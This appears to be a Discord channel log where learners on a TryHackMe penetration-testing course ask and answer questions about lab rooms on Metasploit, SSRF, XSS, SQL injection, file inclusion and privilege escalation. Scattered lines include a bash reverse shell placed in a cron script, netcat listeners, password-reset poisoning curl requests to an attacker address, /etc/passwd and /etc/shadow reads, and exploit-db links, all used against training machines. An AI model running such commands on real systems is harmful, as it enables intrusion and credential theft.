#junior-pentester-path

newline is a character nevar 4get 👍

In windows it's 2

what I want to know is what kind of godforsaken typewriter were these people using that did a line feed after the carriage return

To answer this question do I need to change the RPORT from 80 to 8000 ? I am in task 2 of the Metasploit Exploitation room.

Nevermind. It turns out that I do

For Task 5 of the Metaexploitation room are we supposed to search for the flag.txt in the C:/Windows/system32 directory? I am somewhat confuse because the hint says used the search command in Meterpreter.

What does the hint say?

Does it say where or how to find it?

It says use search, doesn't search search the whole system anyway?

It says : "You can use Meterpreter's "search" command."

Ok, have you looked into the search command and how it works?

I know how the search command works in msfconsole. But The module didn't go over Meterpreter

https://www.offensive-security.com/metasploit-unleashed/searching-content/

Research, as always, is absolutely critical

If you want to know about searching in meterpreter, you google meterpreter search and you get lovely offsec documentation like that

Have a look at the first few lines in that article

I would have but I wanted to follow the module and it just threw 'meterpreter' in there even though the module didn't go over it

You absolutely need to support THM rooms with research and reading

They have good coverage, but it needs to be supported with reading.

I'm lucky my THM is 10.8.xx.xx

I have the first two octets now

|| shell to meterpreter || do google

I'd just change it.

Yeah.

My staff cookie comes through in about 5 sec(s)

Possibly a script that runs like every minute like the Ra admin one.

Mine is only coming through when I open the ticket for some reason

Ik,

I was curious about that too, because I can take other peoples target IP's and then do it, and it works for me, not them.

Obviously that's because I'm 10.8

So what are the wait times again?

ok I'll restart

I did

This one took slightly longer.

Strongly suspect it will be a headless browser

Better remove the video so the cookie isn't given away.

netcat's still not showing with a fresh box and 1 ticket

I started making an XSS room before Adam joined and it was with selenium, that room never happened in the end due to it being a pain to automate lots of different actions

i have finished this path yaaay 😄

Is it bad to not understand a lot of this until you look at walkthrough videos?

Finishing the pre sec course rn

You should know yourself and what is your most effective way of learning

Walkthrough arent evil.

But you won't learn either if you just read them

-> Balance

how's it going?

I think I messed up the box I was working on because I sent multiple requests with extreme inputs in an attempt to get a 500 Internal Error

and now it's been 3 minutes

Oh wait the servers back

poggers

Which VPN server you are using?

EU1.

COOL

For the Metasploit Meterpreter room , do I need to be in the enum_shares "directory" to determine what the name of the share the user uses? I looked at the hint and it suggested that I should use the enum_shares exploit but first that I needed to run a background session

Nevermind figured it out. I needed to type "sessions -i 1" and then I typed "run post/windows/gather/enum_shares"

@verbal cargo or anyone who may be able to help explain. I tried doing some searching around to figure this task out, but I never came up with the '&x=' solution appended at the end of the URL to get the flag. Does this just disregard the original first part of the URL request? Wasn't able to come up with much from a google search, so figured I'd ask in here for a bit of an explanation for my own understanding. Thanks in advance!

Gave +1 Rep to @verbal cargo

I'm not totally clear on it but this webpage makes it sound like it's about stopping some sort of recursion loop, where the data you're passing as the url parameter value can be expanded more than desired https://www.hackingetico.org/ssrf-server-side-request-forgery-explicación-y-práctica-habitación-de-tryhackme/

I get an error when I attempt to run the hashdump module. Do I have to go back and type ' use /exploit/windows/smb/psexec' and change the SMBUser from 'ballen' to 'jchambers' by typing of course 'set SMBUser jchambers' ?

Ahh I see. Thank you @ancient marlin! I pulled this from the article you linked and translated: "In the track it tells us that the payload must end in &x= so that it ignores the rest of the URL it asks for."

I must have missed this at some point. Much appreciated for the resource and explanation!

Gave +1 Rep to @ancient marlin

I am trying to do the Dll hijacking room but can not get the file to the windows machine

The wget command doesn’t or work or I am doing it wrong not sure what to specify for port

Nvm

Helps if the internet is connected on the windows machine

It's not meant to be on THM, the target machines are LAN only

still stuck on this error

Did you read the hint?

figured it out. All i needed to do was type 'hashdump'. Way less complicated than I made it out to be.

How do you get the wget command to work in PS then I get an error every time not at comp right now to show error.

Updated the Cross-Site Scripting Task 8 information:
#junior-pentester-path message

on my end it's an alias to Invoke-WebRequest
get-help Invoke-WebRequest -examples

So right now I'm in Walking an Application, on Task 3, Viewing the Page Source. And when i input the url I get an error, any ideas?

Can't add an attachment so here's an Imgur link https://imgur.com/a/UnvmjDR

Oh are we not allowed to send links?

Your URL is wrong, you havent put the <machine IP>

God is that embarassing

Still nothing. I'm just getting a 405

Start the target machine first dude

Then paste the IP to your browser it will work

lmao thanks for being patient man

I got it now, just gotta read more carefully next time. thanks man

Working??

Pretty sure! havent seen this step yet but I think we're okay

Good! Best of luck

Thanks!

So are all the moderators of each room certified pentesters?

If you are talking about the room creators, then no, not necessarily

Oh, bc I realized that you guys need to have an extensive knowledge of the room you're moderating

and I thought 'Huh, wonder if the discord mods are certified" and now I'm here.

I'm not sure what you mean with "the room you are moderating" ?
Many of the discord mods might be certified, but you don't have to have a certificate to have knowledge
Beside that, mods are moderating the discord, not the rooms on tryhackme 🙂

Over the LAN, not over the internet

I am waiting forever for cronjob in task crontab in room linux privesc

Add rev shell code in all the files and wait for it

still see nothing

Terminate and start again.

Check the file permissons, of for example backup.sh

It's rush hour or something, hard to connect to machine. Maybe try next time, but it's strange when can rev shell

I try on my own vmware and It worked.

Authentication Bypass Room

Task 4 Logic Flaw

can someone explain it to me in private, i can't understand it at all

so upon following the steps

i did this

the reseted the email giving me this green box : We'll send you a reset email to robert@acmeitsupport.thm

this did this string

curl 'http://10.10.45.61/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert'

then this

curl 'http://10.10.45.61/customers/reset?email=robert%40acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email=attacker@hacker.com'

but i didn't get the green box saying we'll send you a reset email to attacker@hacker.com

then i created an account with the name: username

and email:{username}@customer.acmeitsupport.thm

then this command

curl 'http://10.10.45.61/customers/reset?email=robert@acmeitsupport.thm' -H 'Content-Type: application/x-www-form-urlencoded' -d 'username=robert&email={username}@customer.acmeitsupport.thm'

but i didn't get a ticket

what am i doing wrong

should i change the {username} to an actual username instead of these cases ?

or should i remove the 2nd curl since i don't have an email called attacker@hacker.com since i don't get a result

and why am i not getting the result where it sais in the greenbox: we'll send you a reset email to attacker@hacker.com

oh well

i solved it, thanks guys

Hey so this is like the lamest thing but I think I found a typo?

hey there! Can anyone please advice me with what shall i proceed after finishing the pre-security learning journey? What would be the next learning path to take?

Well you can go with the jr pentester path if you want more offensive knowledge or with the cyber defense for the defensive part of cybersecurity...
You can try also the web fundamentals path that one is nice also...

File Intrusion Room, Task8 Challenge

changed the GET method in network developer tools

and still i get no result

even when i double click the blue POST that i created double times it opens a tab with a GET method in the source code

did it with burpsuite to save time

but is it better to do it via curl or manual response rather than burpsuite ?

oh and thank @steel nymph

Gave +1 Rep to @steel nymph

Curl and burp repeater are better

Both are better

Do whatever you are familiar with, one is CLI and other is GUI

i mean does anyone have any advantage over the other ?

would knowing and reapeting using curl command be better as a manual way {not to be script kiddie} or anything but i'd rather work smart and not hard lol but i work both ways to know what's better

SSRF, Task2 SSRF Example

why would we use

https://website.thm/item/2?server=server.website.thm/flag?id=9&x=

instead of

https://website.thm/item/2?server&x=server.website.thm/flag?id=9

oh F my bad

Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string

but i mean why does the 2nd url start on the start of server request side

which is server.website.thm/flag?id=9

Because it's meant to replace the sub domain that the server is requesting with whatever the server parameter in the URL is.
E.g server parameter = api | Server request = api.website.thm
server parameter = shop | Server request = shop.website.thm

quick question guys: is it better to use burp or url injection in the sql injection in real world exercise since guessing the databases and usernames and passwords takes too much time and too much requests to the server?

doing some quick sql injection commands to check if it works or not before burp is a decent idea yeah

after that if you need to bruteforce the login there are better tools then burp for the job

unless you have the paid version of burp

forgot to mention that sqlmap is a thingy and can be used to do a lot of sql injection easier

thanks @steel nymph

Gave +1 Rep to @steel nymph

thanks @sage current and @steel nymph , i was just annoyed with how long the sql command injection is and how time consuming it is hence i asked this question, but overall thanks guys after all "work smart not hard", it's good to know the concept but a short path to getting around it if you can't get the full idea would pretty much equals the same output .

Gave +1 Rep to @sage current

i think it goes with too much experiments, since the room of sql injection is pretty forward and goes only 1 way, my main point is most of rooms that contains alot of info, i can't basically wrap my head around it even with so many tries in the same exercise, it's hard to memorize all those commands, i believe thats cause i have no prior knowledge .

i memorize and try to understand the sequence of the command, but still i fail meh .

write notes.... write notes.... write notes

doing that with Notion, was @high lintel idea since that start lol. i'm saying should i worry if i don't get it even when i finish the room? like i have this problem with 3 rooms {SSRF/XSS/SQL}, it's basically because i can't wrap my head around them as i said, should i be moving forward so the exercise machines would help me understand more in depth and backing to room when this happens would let me say: OH..Ok so this does that and that's how it's connected .

or should i stay in those rooms till i fully get it ?

redoing the challenges from those instruction rooms might help a bit

another way would be to read others notes or watch others notes

also known as looking at writeups

which is fine if you read them carefully and try and learn to understand in shadow opinion

Thanks for your time guys, i hope i didn't waste it.. i'll try this after i finish the Burp repeater room.

Yo i got a question. When brute forcing for subdomains, what is the difference between brute forcing for sub domains, vs brute forcing for virtual hosts?

ah i see. thanks homie ❤️

Gave +1 Rep to @steel nymph

Burp Suite: Intruder

Task 11 : Practical Challenge

so the list is payload type is set to NUMBERS

when i put a range from 0-100

the payload count is still 0

so when i set number 1 to the step

and payload becomes 257

and i get some letters in my payload result and search

i got the flag anyway but i'm asking is this kind of bug or what is it ?

why are the numbers set from 0 to 100 and payload count is 257, is it the actual payload itself that is named numbers contains payloads like 3a, 5c in it ?

It seems because you have set the number format to hex instead of decimal

Can some one learn my how get into server and shut it down

What are you trying to do?

Get into server in our house

Sorry that i reply now i had a class

walk up to server
press power button

Ok

I did it

Hi all

First time posting here, please don't judge, I'll try my best. Any idea what that could be? I cant find the answer 🙂
How are stored XSS payloads usually stored on a website?

Is this for a tryhackme room?

Please can you state the room, task, and question number

Yes just a sec

It's from Junior Pentest Path, Cross-site Scripting Task 4

I guess comments, payload, injected code, javascript but it seems it is not the expected (8 letter) answer

Oh okay, it was database after all. It might be that I am not English native speaker, but wouldn't the question be better asked as "Where are ..." instead of "How are they stored"?

hmm maybe

I am trying to use the multi/handler Metasploit technique to do a Remote shell execution attack, but I get a "Invalid session identifier" error when I attempt to run that technique. I am on Task 13 of the "What the Shell" room and using a linux machine

multi/handler doesn't actually do anything other than listen for the connection, you need to make the shell start somehow

so do an nc -lvnp 4444 command on the @shell@practice-linux.com terminal perhaps?

No, that's yet another listener

@practice-linux.com That is very very concerning.

Hello, i am stuck in the Privilege Escalation: Capabilities (room Linux PrivEsc), the payload inside de vim -c is not giving me the shell, perhaps i am missing something? thanks

do the check of capabilties on the target machine again

Thanks, i figure it out using view instead of vim

Gave +1 Rep to @sage current

good job

generally in the room the example that they give you is not exactly the same as the intended way to get the flag

Evening all

when I am entering in what I want to do in a netcat connection I cant add a new line (typically shift + enter) any ideas??

Not sure if I understand what you mean exactly, could you provide a screenshot ?

To understand this you need to understand how url are formed, specially how parameters are passed. '&' is a special character that seperates variables(x=value_of_x&y=value_of_y). Then you can understand the forgery

I figured it out. Sorry for the confusing message. Thank you for the help though

Gave +1 Rep to @shadow echo

Finally done with this path 🎉

I get a 'permission denied' when I try to download this exploit to my target machine , even when I changed the permissions of the Exploit. I am in the Lin Priv Esc Room

The link to the exploit . https://www.exploit-db.com/exploits/37292

Try changing your working directory to somewhere like /tmp where you are able to write with your current user and downloading it after that.

Is there any CTF rooms recommended to someone who has finished this path?

https://tryhackme.com/hacktivities?tab=practice
Under "general", they'll show you recommended rooms based on your experience :)

Tried that and I am still getting an error.

\

Don't specify /tmp while requesting the file

As you're already in that dir

I don't know what you mean. So type 'wget http://10.10.186.146:8080/37292.c'

Still getting a 'permission denied' error. Maybe I need to use a chmod command, but I tried all different kinds of chmod commands previous that did not work.

do I need to change permissions using the chmod command?

No

You need to change directory to somewhere that you're allowed to create and write files in.

do I need to change the directory in my target machine or attacking machine?

Well where are you trying to write a file to?

I was going to initially download it and then after I downloaded it give it the write permissions

so to the target machine

*in the target machine

Correct.
So you need to find a dir that you can write to.

And someone already suggested one

Am i missing something here? Im currently in https://tryhackme.com/room/winprivesc at T4, trying to leverage Fitbits unquoted service path to plant a shell there. ive tried to do that a few days ago already but today i cant sc qc Fitbit Connect as seen in the screenie. Last time i was able to. ive even executed the service so it is running but it still shows "not installed". Any tips on this before i replace the service file with the shell?

stupidly ez

thank you. that was the last thing i thought of, jesus

Thanks!

Gave +1 Rep to @steel nymph

Compiling this exploit will not help since when I ran the code it already showed a syntax error right?

No, not correct

It's C. C must be compiled to run.

You can't ./ a c file, you need to do that to the compiled binary

Thank you the additional follow-up explanation 🙂

Gave +1 Rep to @verbal cargo

I am in Content Discovery task 3. I got the answer, but I am wondering how to do this in real life. If this only works if they forgot to replace the default icon with a custom one, how can I tell if that's the case? In this example, it looks like they are using a custom favicon.

well dunno exactly but generally you can use plugins in firefox to check favicons for commonly used backends/frontends

i need to learn brup suit suggest me where to learn

https://tryhackme.com/module/learn-burp-suite

Try hack me has a room and if you are like me, go to youtube and watch a tutorial it is not as hard as it look like in the beginning 🙂

Thank u guys

no worries! 😛

So if I want to check Microsoft for example, I go to https://c.s-microsoft.com/favicon.ico?v2 . If I am not using Linux, can I just right click and download the file and check the MD5 with my own hashing software?

yuups and then put the md5 checksum into a tool that checks it against known platforms

Is this a vulnerability that is commonly found? I can't find many sites that have it. Also I don't understand what is happening. If the favicon is a custom favicon, how could it have a checksum that matches one on that OWASP list?

not actually sure how common it is but for newly setup websites shadow would assume it happens sometimes

The icon in the tryhackme website looks like a custom favicon.

Thanks for explaining! Now I see that that is from the page that says "website coming soon..."

So for Task 7 of the Linux Privi room , I logged into gerry conways account and managed to locate the flag3.txt file but don't have the right permissions.

I don't think you even have to log into that account, just find a way to read flag3.txt

The task is about SUID, so look for files that have that bit set

Read the task carefully, becoz the task has given you command to find SUID binaries.

Protocols and Servers Room

Task 3

why can't i get the flag.thm via telnet connection and i can get it over the website ?

Read the task text again, you have to specify a certain header

so i need to write down the host: telnet part

Right

Vulnerability Capstone

Task 2

What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.

i don't know how could i use this exploit

https://www.exploit-db.com/exploits/47138

what do i have to change

i changed the first url

there is line under while 1 :

the proxy =

i'm really trash in understanding those exploits and the mechanism how they work

it using burp suite together with the rest

so i saw about 2 youtube walkthrough

1 using burpsuite and other removing the burp command and using mkfifo and a stable shell

and other guy ran just python3 and everything worked fine

so it was just weird for me that i can simply remove codes from the exploit since i know nothing of scripting langs.

well you are looking at the wrong exploit in that case.... the correct one is this: https://www.exploit-db.com/exploits/50477 @jaunty dagger

i.e the one shadow linked should be able to be run with just python with near zero modifications

Loooks like the variable xxxx is not used in the burp_url.

if the remote code execution 3 does not work there is a file on the attackbox for this.... which shadow can send here:

sorry for kinda spammy text but felt better to do it this way instead of uploading a random file

oh wait yeah that is true.....

dunno if that works for .py files

yuup that works better

thanks @steel nymph

Gave +1 Rep to @steel nymph

making things less spammy is a good thingy

lmao yeah of course that is the result as it is a exploit for fuel cms 1.4

and it is a python file

python files are scary

also shadow has better ideas and don't feel like trying to ruin their relationship with this discord by trying to hack its users

fair shadow assumed you were but felt a clarification was needed anyways

@hushed copper this is neat

You've not seen that?

Nope, I don't send people payloads

Tbf, I had Discord turn my zipfile of BoF payloads that I sent to a uni friend into a pasta recipe last week, soooooo

lmao that is a nice change

I'm nearly done with Jr pentester path, is there any recommended boxes to start on after that? I'm kind of looking to roll through reviewing on the stuff I learned in Jr pentester.

Great thanks, I wasn't sure if I should jump right into that

https://tryhackme.com/hacktivities?tab=practice then the general tab

is also a good bet

Is offensive pentesting introducing a lot of new stuff or just ctfs based on things in Jr?

Thanks I'll look at these as well

Gave +1 Rep to @sage current

that page updates for each user as they go along if shadow understands it correctly so you will get recommended ctf boxes that fit into your knowledge

Awesome thanks, much appreciated

Gave +1 Rep to @steel nymph

Ah great, maybe I'll hit some of these boxes in between paths

Linux PrivEsc

Task7

i can't get the SUID file 😦

i tried base 64

and it's not working

tried the command from GTFOBins and it's not working actually

i think the choice of service is either wrong or i'm trying to find it the wrong way

the highlighted area is where i searched

i tried everything else actually

i tried the shell

i'll show you

so i was going the right way ?

F

find / -type f -perm -04000 -ls 2>/dev/null , i used this at the start

SUID

i can't :3

when i typed sudo -l

nothin showed up

so i have no premission to run sudo

oh

wait ..

i'll try this one

so i might need to you to solve it for me since i don't understand what it really sais :3

i tried now

but seems i'm getting it the wrong way

i tried LFILE=sudo

./base64 "$LFILE" | base64 --decode

but seems it doesn't work

reason: ./base64 not found

because i can't install it

done it

\

i was able to access the file, man i'm stupid xD

last question how do i copy out of this ubuntu black windows

or should i switch to attackthebox ?

mark text then ctrl + shift + c

to past into terminal it is ctrl + shift + v

nano /etc/shadow will print the contents of the /etc/shadow file. We can now use the unshadow tool to create a file crackable by John the Ripper. To achieve this, unshadow needs both the /etc/shadow and /etc/passwd files.

in Task 7

What is the password of user2?

i just went to hashcat wiki

got the hashcat format

used john to decrypt it

but i didn't use the unshadow method

is this ok ? or should i know this shadow method ?

@steel nymph are you a wizard ?

So right now I'm in Authentication Bypass Task 3, and after I run the brute force command it comes up with this error

"Keyword W1 defined, but not found in the headers, method, URL, or POST data" I could easily be missing something but i've read it through a few times and can't seem to find the problem,.

Linux PrivEsc

Task9

why doesn't the netcat port listen and receive connection ?

Check the file permissions of backup.sh, you probably need to make it executable

i got so angry with the file that i did chmod 777 instead of +x

Linux PrivEsc

Task 10

Exploit the $PATH vulnerability to read the content of the flag6.txt file.

You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file.

so the steps i took in this challange :-

1- echo $PATH

2- find / -writable 2>/dev/null

3- i found a file called thm.py in /home/murdoch

4- cat that file and that the results

i did ./test

then i entered the root priv.

but i have question here

it's a pre-setup file as it's an advanced PrivEsc for us as beginners ?

I think the thm.py is simply showing you what the test binary is doing

oh ok, since i didn't really understand the code so i said i might ask

so as a i said, it's pre setup file

Well the test binary is looking for a file called thm and runs that, since the test binary runs with root permissions, your thm file will be executed with root perms too

why can't i just python3 thm.py and it works directly ?

First of all I think it wouldn't be executed with root perms and secondly, it would just do the same thing as the test binary itself, looking for a file called thm on the system

True point

i don't understand this lesson pretty well, i think i'll revise it later when i get it in a ctf

If you run the cat command, how does your system find the cat binary ?

i'm shy to say that i'm this stupid that i don't know

Deja Vu explains this quite well IMO

It's fine, doesn't mean you are stupid.
I don't know about Deja Vu what James said, but for sure something to check out if he recommends it.
Either way, if you run any command, is it cat ls or whatever, your system is checking the PATH variable.
In your PATH variable are paths like /usr/bin/ or maybe even /home/karen etc.
So it's checking all these paths if there is a binary called cat, if there is, it can execute it.
So since there is /usr/bin/cat it can execute it.
It's the same with the thm binary your system is looking for now, it's checking all the paths in the PATH variable.

I hope that's making sense, I tried my best to explain it 😄

actually that's much more easy to understand rn

Linux PrivEsc

Task 11

so why can't i cd to backup :3 ?

ok i understood wht i did wrong

i was putting files on other file lol

In subdomain enumeration task 6, I am supposed to find the most occurring size value. What is that?

You're getting errors

Thanks!

Gave +1 Rep to @steel nymph

file inclusion task 5 lab 4 . when put /. or %00 the response is not given... instead have to use // which is in the lab 5... so how can i response lab 4 without knowing lab 5? or it also work doing this http://ip/lab4.php?file=../../../../etc/passwd/ and it has nothing to do with the exercise

Windows PrivEsc

Task2

What is the state of Windows Defender?

i used

sc query windefend

nothing comes out

went to control panel

but i can't get to know the firewall status unless i got the admin pass lol which i think is not part of the lesson

tried even sc query WinDefend

doesn't return back results

maybe the machine is stuck

sc query windefend

Are you using Cmd or Powershell?

can't find the bpnetworking room (https://tryhackme.com/room/bpnetworking) that's linked in nmap01, has it been replaced with some other room?

Powershell

Use cmd 😉

Where should i go after Jr-Pentester path is finished? should i move to web application fundamentals or offensive ?

I have just started the course, and I cannot find the flag in the comment of the page source for some reason? There are 3 comments and they are pretty short, I'm pretty sure I haven't missed them

Are you looking in the right page ?

The site is linked in the room (Acme IT support). I went right click -> Page Source

Did you read the comments?

Any of them seem interesting?

Very funny. i did read them

One of them is with the link which is used later on, the other don't seem to be useful.

I would post a screenshot but I am not permitted, is the flag supposed to be in the comment?

I'm not being sarcastic here, this is a genuine tip. Someone asked the same thing recently

You can post screenshots if you verify with the bot, follow the steps in the link below

!docs verify

ugh,

Thanks, moment

Asking the question again for the last time not to bother you all @remote iris @idle bison @shadow echo

This should be it. Unless I am blind (which I probably am), I don't see the token which is supposed to be in one of the comments

Try the Comptia pentest+

Please don't do this.
There's no reason to ping a bunch of people to answer a question that anyone can, it just seems impatient

Yeah, figured it out the moment I sent it, fuck me

Sorry @idle bison

With the CapStone Challenge should all 7 privilege escalation attacks you tried throughout the Linux PrivEsc room work or do only one of those privilege escalation attacks work and you have to figure out which one

I don't think that all of them will work, so most likely you will have to figure out a way to priv esc, but can't say for sure anymore since it's a while ago since I did that

Thank you for reporting, this link will be removed shortly, as the bpnetworking room has been retired. 🙏

Gave +1 Rep to @whole timber

Would this be a linux kernel?

This has now been fixed. 🥳

Awesome, thanks a lot for looking into it. A bunch of other rooms have the bpnetworking room liked as well, don't remember which one, hopefully you can fix them too.

Hmm, a quick question, there are challenges here, right? It mentions using Burpsuite which is the whole section inside the course, but only after this section. Should I do that first and then come back or is it not required?

This is the File Inclusion room.

i think you take a look at burpsuite first and then come back.. it easy to do that challenge with it..or you can choose do it using brawser address bar

It's not required to use Burp for these challenges, you should be able to solve them with the dev tools or curl as well 🙂

Alrighty thank you

In the Linux PrivEsc room, I'm unable to use wget to get the exploit on the vulnerable machine onto the local one. Tried troubleshooting, but StackOverflow said I needed sudo privileges, which I don't have. Here's the error I'm getting:

Connecting to [LOCAL_IP]:[LOCAL_PORT]... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5119 (5.0K) [text/plain]
37292.c: Permission denied

Cannot write to ‘37292.c’ (Permission denied).

Any ideas?

That would most likely mean you don't have write permission in the directory you are currently in while trying to wget

So just search for a directory you are able to write to

Gotcha! Thanks!

On the 9th task of the Linux PrixEsc room (https://tryhackme.com/room/linprivesc), I'm unable to catch the reverse shell on my listener. Have done the following:

On the vulnerable machine:

1. Replaced the cronjob executing backup.sh at /home/karen/backup.sh with
   bash -i >& /dev/tcp/[Local IP]/6666 0>&1
2. Made the file an executable with chmod +x backup.sh

But I don't catch a shell:

nc -lvnp 6666
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
|

Don't know where I'm going wrong.

Did you also add the shebang ?

I am trying to finish the Authentication Bypass room, but I am getting a site cannot be reached error for the Acme IT page. I was on the site Friday, but had to stop. The link it is taking me to is http://10.10.225.113/customers/reset. I have cleared my cache and closed/reopened the room and attack box. Any other ideas?

you got the problem 🤦

thank you so much

Hi

I have a question - subject: Local File Inclusion (LFI), PHP

why does http://webapp.thm/get.php?file=/etc/passwd work?

the include function asks for a specific $_GET, namely parameter "lang"

why is the parameter 'file' accepted then?

Because it's a typo

what do you mean

The content in the room has a mistake

hmm ok. What would normally be written there?

It should say index.html?lang=/etc/passwd

this makes more sense to me

index.php?lang=/etc/passwd

thanks

cc @merry night typo leading to confusion

Lots of mistakes, yes. I got put off by all the errors walking through the room.

Please do report them in #room-bugs

👌

In the Windows PrivEsc room, task 2 requires that I find the state of Windows Defender. As per the writeup, the command I should execute is: sc query windefend, but doing it in Powershell on the VM doesn't do anything...

Any ideas?

try sc.exe query windefend or run the above command you used in cmd

works, thank you so much

Gave +1 Rep to @sage current

no problem

this is because powershell has a built in sc cmdlet and you want the sc.exe instance

ah makes sense :)

just a quick clarification: nothing to do with a specific task per se, but with the paths challenges are the attack boxes 100% needed to complete?

The attackbox is a convenience thing

It's an Ubuntu machine loaded with pentest tools

alright, well then either i don't have my ovpn set up correctly b/c some of the tasks only show progress when using the attackbox, othertimes, not the case

just wanted to sniff out what my issue was

is that task 8? i'm working on task 7 rn

good to know, time to reset and do it in the attack box

to late, already did, but i've already passed the location i was on in task 7

just to get stuck on level 4, sounds right

I believe they said it would work on EU1?

Eh, the room should really be fixed

it's entirely possible that it's a picnic error when vpn is involved if i'm being wholly honest

I am having trouble copying text outside the windows virtual terminal into the windows virtual terminal . I am in the windows PrivEsc room

how you do it? you mean from your window to the attack machine?

can someone explain me step 1 to step 2 ? I read the Description, but im still confused

its about SSRF

Description:
"In this example, the attacker can control the server's subdomain to which the request is made. Take note of the payload ending in &x= being used to stop the remaining path from being appended to the end of the attacker's URL and instead turns it into a parameter (?x=) on the query string."

shadow would if they actually full understood ssrf

lets just state it weird

we have the first part website.thm/stock?server and the second part api.website.thm/api/user. In step 2 there is the request to the API server. why does it say website.thm/stock/item?id=123 in the querystring. where does that come from all of a sudden?

"[...] &x= being used to stop the remaining path from being appended to the end of the attacker's URL. "

Dont understand why the API-Server get website.thm/stock/item?id=123 as querystring. I thought it would be cut off.

I'm too stubborn for that 😄

fair

shadow just gets you somehow make the website refer to itself and there by get access to api and thingies you are not meant to have access too

can a URL contain multiple question marks in the querystring?

I know that the first ? initiate the querystring.

but in this example I see two ?

These are the sorts of questions that make hacking a thing, evidently yes but how should the server handle it in this case?

Never underestimate the value of doing stupid shit and seeing what happens, good motto to play by

I think I understand

The first ? is the introduction of the query string. The part that is in the url= parameter is sent to the API server. The 2nd ? is intended for the API server.

The second ? here is part of the URL for the API server

One for the webserver and the url= part has his own ? for the API Server

Now my previous question also makes more sense.

Let's imagine that there is a simple web server without an API server. If I would now accidentally make two ?, what would be the effect of the 2nd?

https://stackoverflow.com/questions/2924160/is-it-valid-to-have-more-than-one-question-mark-in-a-url

It goes back to the RFC, as many things do

thank you

Gave +1 Rep to @idle bison

here I am again. Greenhat in action 😄

Direct access to /private is prohibited. Here you try to access the directory private by using path traversal to bypass the lock. So one level higher ../ and then into the private directory. Can you explain to me what the x is doing here?

Description: "This trick works because when the web server receives the request for x/../private, it knows that the ../ string means to move up a directory that now translates the request to just /private"

.
My question: what is the x doing here? This is not a directory or something (?)

probably bypassing a fillter that makes it unable to start with a /

The x pretends to be another directory, which means it moves into the x directory, and back out of it with the ../

oooh that makes sense

why does this work on a webserver and not on my Linux?

on my Linux: No such file or directory

in terminal

I can not answer that for you, either that is a webserver thing, or there has to be a real directory called x in order to work

I entered x/y/z/../../../private to this on the web server. That worked. Your statement that it pretends these directories exist seems plausible to me. Am just confused as to why this doesn't work on the Linux terminal. After all, the web server is Linux (mostly, I think).

maybe i'll find out soon.

Well the webserver most likely is apache or nginx, running on linux, so it's kind of not linux itself and therefore might get processed differently

hmm ok

can anyone help with systemctl on nessus

tried to start the web

with the command but it's doing nothing

Dude, it did the command that was supplied by you, if you check the status you will see everything

No news is good news, check if it's open and running

yes i used the command that was displayed

and i haven't checked yet

thx

In general, no news is good news. If it fails, you will be told.

Why so, if you don't mind me asking?

I've been stuck on it all day and wondering what I was doing wrong. 😢

because of the way the target machines routing is setup it is only allowed to access the 10.10.x.x subnet

I'm working on the active recon room. When doing the telnet exercise, shift+enter to put in the host: name part of the command works. On the netcat exercise, trying to do shift+enter just enters the command prematurely, yet the instructions still say to use shift+enter. Am I doing something wrong or is there a workaround?

Where does it say to use shift+enter ?

Task 6 "First, you can connect to a server, as you did with Telnet, to collect its banner using nc MACHINE_IP PORT, which is quite similar to our previous telnet MACHINE_IP PORT. Note that you might need to press SHIFT+ENTER after the GET line."

So what if you just use enter? As it said "might need to"

Enter just enters the command

I'm using the attackbox I don't know if that'd causing the issue

By just "enters the command", you mean it's jumping into a new line, right ?

No, like it runs the command (and returns an unsuccessful request) before I can type on the new line. Pressing enter on the telnet command does let me type on the new line, but netcat does not.

Mh, I just tried it with the attackbox and it seems to be working just fine.

So you might want to provide a screenshot of that, therefore you would have to verify first

!docs verify

So, I'm doing the "junior pentester path" and I was wondering how can I practice what I've learned. My first ideia was to explore the vulnerabilities on Juice Shop OWASP project. Do you guys have any other advice/ideia to practice what is learned on "junior pentester path"?

of course, here i'm talking about web penetration

cheers

can I ask a noob question here ?

I like to learn web pentest. I am following a youtube tutorial. I downloaded owasp zap, apache2 , php, mutillidae in the /var/www/html directory and installed some other packages. I get an error message while unpacking mysql-server. It is some kind of a dpkg failier. So I downloaded mariadb instead of mysql-server. It will cause problem ?

And also I installed firefox with foxy proxy extenstion and added an option 127.0.0.1 with port 8080

also I changed the network setting of firefox to 127.0.0.1 with port 8080

no..

I am following a yt channel. But I dont know where to ask my doubts

and clear the problems

Can i also ask a question?

im having an issue finding the HTML flag in the Walking an Application task 3

yes

ill send ss

ok

done

ive checked the source code, i went to the link in the comment at the bottom

which is https://static-labs.tryhackme.cloud/sites/thm-web-framework

but i didnt see a flag

or i dont know how to recognize it

that gave me a "FILE NOT FOUND"

/new-home-beta

i pasted that into my browser

yea

thats what happened

what do i do then

isnt it a pathway?

I found it

view-source:https://10-10-76-45.p.thmlabs.com/new-home-beta

In the first lab the web framework site for me was down, wasn't pinging (but was able to resolve its ip), wouldnt respond to telnet 443 or 80, and had no ports open for nmap (...) . I'm guessing it was just down; I'm new to tryhackme and have a free account, how often does this happen?

Basically, I'm missing that one flag to go to the next page

Based on the hint I would just need to get the contents, see a reference to a 10-10--.p.thmlabs.com/somefile.zip and then get the flag from those contents, but I wasn't able to get the framework site at all

Sorry, this was for walkinganapplication in the Jr. pentester path

Hi guys i'm doing the Introducing to web hacking/Subdomain Enumeration/Virtual host module. When using the ffuf command on my own kali machine it's taking so long time meanwhile when i'm using it on the attackbox i'm getting instant results. How come it's taking so long time on my machine?

But you get results when doing it on your own machine?

I end up cancelling the scan after a while so no i have never sen any results.

Could you show a screenshot of you running ffuf, so to see the command as well as the progress ?

https://imgur.com/a/5dDV2JQ

I'm getting a lot of errors two!

https://imgur.com/a/hwG9wX6

Oh I forgot, if you verify you can send screenshots directly in here, which most of the people prefer, including myself

Are you connected to the thm vpn ?

yes i'm

How do i verify myself

!docs verify

I thought i did

Can I access your target machine myself?

How i'm a complete beginer

so you need to explain for me what you mean 😄

You just have to say yes or no 😄

